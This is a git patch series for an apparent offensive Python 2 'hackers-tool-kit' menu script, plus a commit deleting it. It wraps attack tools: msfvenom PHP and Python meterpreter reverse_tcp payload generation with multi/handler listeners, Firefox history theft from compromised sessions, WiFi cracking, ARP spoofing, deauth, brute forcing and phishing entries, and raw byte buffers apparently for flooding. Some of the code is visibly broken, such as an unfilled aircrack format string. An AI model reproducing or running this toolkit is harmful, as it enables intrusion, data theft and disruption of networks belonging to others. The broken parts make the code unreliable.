METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#FOXHIS START# +#------------# +def foxhis(): + os.system('echo "sessions\n" >> foxhisses.rc') + os.system('echo "exit\n" >> foxhisses.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r foxhisses.rc') + os.system('rm -rf foxhisses.rc') + print "\n" + ses = raw_input("Session: ") + print "\nMaximum time (seconds) to wait for a response\n" + time = raw_input("Timeout: ") + os.system('echo "use firefox/gather/history\n" >> foxhis.rc') + os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) + os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) + os.system('echo "run\n" >> foxhis.rc') + os.system('msfconsole -q -r foxhis.rc') + os.system('rm -fr foxhis.rc') +#----------# +#FOXHIS END# + + +#RHAWK START# +#-----------# +def rhawk(): + os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") +#---------# +#RHAWK END# + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + if x == "foxhis": + foxhis() + if x == "rhawk": + rhawk() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From d06b2e487a2b8b90ee8148f4ec974d2fa8aceba8 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 29 May 2019 03:51:04 +0100 Subject: [PATCH 162/214] Delete htk.py --- htk.py | 3117 -------------------------------------------------------- 1 file changed, 3117 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 959631f..0000000 --- a/htk.py +++ /dev/null @@ -1,3117 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @tuf_unkn0wn -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#WARNING START# -#-------------# -from tkinter import * -win = Tk() -warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' -messageVar = Message(win, text = warn) -messageVar.config(bg='red') -messageVar.pack( ) -win.title('HTK: Warning!') -button = Button(win, text='OK', width=25, command=win.destroy) -button.pack() -win.mainloop() -#-----------# -#WARNING END# - -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """ - type ? for help -\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - type ? for help - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - - type ? for help - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - type ? for help - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """ - type ? for help\033[91m - -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - type ? for help - """.decode('utf-8') - -def mainbanner10(): - print """\033[0m - ░░░▓█▒░▒▒▒▓▓░ - ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ - ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ - ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ - ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ - ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ - ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ - ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ - ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ - ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ - ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ - ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ - ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ - ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ - ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ - 